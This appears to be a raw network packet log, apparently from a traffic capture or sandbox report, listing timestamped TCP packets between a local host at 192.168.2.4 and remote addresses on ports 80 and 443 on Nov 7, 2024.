Nov 7, 2024 07:33:31.273693085 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.273740053 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.328874111 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.328902960 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.328912973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.328927994 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.328944921 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329165936 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329189062 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329200029 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329210043 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329217911 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329236031 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329262018 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329288960 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329298019 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329299927 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329333067 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329391003 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329432964 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329484940 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329495907 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329510927 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329530001 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329530001 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329546928 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329669952 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329705954 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329708099 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329721928 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329736948 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329749107 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329799891 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329814911 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329823971 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.329838991 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.329862118 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330050945 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330085993 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330110073 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330120087 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330148935 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330226898 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330259085 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330269098 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330280066 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330298901 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330327034 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330374002 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330411911 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330435038 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330446005 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330473900 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330486059 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330522060 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330533028 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330542088 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330552101 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330553055 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330588102 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330945015 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330955029 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330969095 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.330996037 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.330996037 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331008911 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331051111 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331062078 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331070900 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331080914 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331094980 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331108093 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331183910 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331195116 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331206083 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331229925 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331229925 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331243038 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331609964 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331620932 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331636906 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331646919 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331660986 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331681013 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331705093 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331716061 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331724882 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.331732035 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331754923 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.331765890 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.333724976 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.333760977 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.333769083 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.333810091 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.336612940 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.336656094 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.410068989 CET	49933	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.410085917 CET	443	49933	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.455457926 CET	49941	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.455471039 CET	443	49941	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.455535889 CET	49941	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.455743074 CET	49941	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.455754042 CET	443	49941	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.481017113 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481066942 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481067896 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481080055 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481102943 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481118917 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481127977 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481134892 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481148005 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481158018 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481168032 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481190920 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481364012 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481375933 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481389046 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481400967 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481419086 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481471062 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481479883 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481492043 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481503963 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481512070 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481517076 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481523037 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481554985 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481574059 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481585026 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481625080 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481626034 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481636047 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481647015 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481666088 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481683969 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481715918 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481733084 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481745005 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481753111 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481770992 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481781006 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481786966 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481792927 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481802940 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481815100 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481823921 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481846094 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481862068 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481918097 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481930017 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481940985 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481949091 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481952906 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481966019 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.481975079 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.481983900 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482018948 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482042074 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482079983 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482091904 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482104063 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482132912 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482175112 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482186079 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482194901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482207060 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482217073 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482220888 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482239962 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482259989 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482295036 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482307911 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482317924 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482330084 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482331991 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482342958 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482376099 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482413054 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482424974 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482435942 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482458115 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482491016 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482522011 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482533932 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482544899 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482563972 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482587099 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482628107 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482640028 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482650995 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.482671976 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.482691050 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.485980988 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.486021996 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.486026049 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.486057997 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.486156940 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.486169100 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.486180067 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.486190081 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.486195087 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.486202002 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.486210108 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.486238003 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.486274004 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.548862934 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.596292973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596322060 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596333027 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596350908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596362114 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596368074 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596399069 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596443892 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596609116 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596648932 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596656084 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596662045 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596688032 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596708059 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596709013 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596723080 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596731901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596744061 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596771955 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596791029 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596828938 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596863985 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596878052 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596894979 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596903086 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596908092 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.596914053 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596931934 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.596955061 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597008944 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597021103 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597033978 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597048998 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597058058 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597073078 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597096920 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597110987 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597121954 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597140074 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597143888 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597151995 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597162008 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597187042 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597188950 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597213030 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597232103 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597249985 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597296953 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597309113 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597320080 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597333908 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597359896 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597367048 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597372055 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597393990 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597421885 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597517014 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597527027 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597541094 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597552061 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597562075 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597568035 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597568035 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597575903 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597592115 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597625971 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597645998 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597664118 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597675085 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597681046 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597692013 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597703934 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597714901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597718000 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597732067 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597754002 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597817898 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597861052 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597867012 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597872972 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597902060 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597923040 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597933054 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597944975 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597954035 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597965956 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.597975969 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.597996950 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.599173069 CET	49942	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.599190950 CET	443	49942	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.599246979 CET	49942	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.599622965 CET	49942	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:31.599636078 CET	443	49942	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:31.626126051 CET	49936	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.626144886 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.626537085 CET	49936	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.626540899 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.634478092 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634491920 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634516001 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634521008 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.634536982 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.634553909 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.634603977 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634615898 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634625912 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634638071 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634644032 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.634656906 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.634675026 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.634713888 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634726048 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.634748936 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.634780884 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.711787939 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.711824894 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.711834908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.711836100 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.711842060 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.711883068 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.711981058 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712019920 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712023020 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712040901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712063074 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712071896 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712141037 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712191105 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712192059 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712203979 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712230921 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712239981 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712256908 CET	80	49934	185.215.113.16	192.168.2.4
